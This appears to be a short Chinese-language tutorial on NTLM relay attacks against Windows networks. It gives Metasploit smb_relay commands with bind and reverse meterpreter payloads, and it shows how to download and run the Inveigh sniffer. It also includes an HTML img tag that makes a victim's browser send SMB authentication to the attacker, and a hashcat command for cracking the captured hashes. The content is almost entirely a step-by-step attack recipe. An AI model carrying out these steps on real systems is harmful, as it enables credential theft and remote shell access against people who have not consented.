前言
NTLM中继攻击
Relay重放
- 受害者与转发后的目标必须用户名和密码都相同,Relay重放才会成功
msf监听端口
正向连接
set payload windows/meterpreter/bind_tcp:设置为主动连接
set smbhost <ip>:设置转发后的目标IP地址
set rhost <ip>:设置目标IP地址
1
2
3
4
5
6
7
| msfconsole
msf > use exploit/windows/smb/smb_relay
msf exploit(windows/smb/smb_relay) > set autorunscript post/windows/manage/migrate
msf exploit(windows/smb/smb_relay) > set payload windows/meterpreter/bind_tcp
msf exploit(windows/smb/smb_relay) > show options
msf exploit(windows/smb/smb_relay) > set smbhost <ip>
msf exploit(windows/smb/smb_relay) > set rhost <ip>
|
反向连接
set lhost <ip>:设置本机IP地址
1
2
3
4
5
6
7
| msfconsole
msf > use exploit/windows/smb/smb_relay
msf exploit(windows/smb/smb_relay) > set autorunscript post/windows/manage/migrate
msf exploit(windows/smb/smb_relay) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/smb_relay) > show options
msf exploit(windows/smb/smb_relay) > set smbhost <ip>
msf exploit(windows/smb/smb_relay) > set lhost <ip>
|
受害者向msf发起smb请求
<ip>:msf服务端IP地址
Inveigh嗅探
下载项目
1
2
3
4
| wget https://github.com/Kevin-Robertson/Inveigh/releases/download/v2.0.11/Inveigh-net8.0-linux-x64-trimmed-single-v2.0.11.tar.gz
mkdir Inveigh
tar -zxvf Inveigh-net8.0-linux-x64-trimmed-single-v2.0.11.tar.gz -C Inveigh
cd Inveigh
|
攻击者启动Inveigh服务
受害者向攻击者发送smb请求
<ip>:Inveigh服务端IP地址
搭建Web页面实现点击页面触发smb请求
<ip>:Inveigh服务端IP地址
1
| <img src="file:///\\<ip>\ipc$">
|
通过hashcat暴力破解NTLM哈希值
下载依赖
1
2
3
| git clone https://github.com/hashcat/hashcat.git
cd hashcat
make && make install
|
暴力破解
-m 5600:指定破解模式为NTLM哈希值
<hash>:上一步骤得到的NTLM哈希值
<file>.txt:字典文件
1
| hashcat -m 5600 <hash> <file>.txt --show
|
完成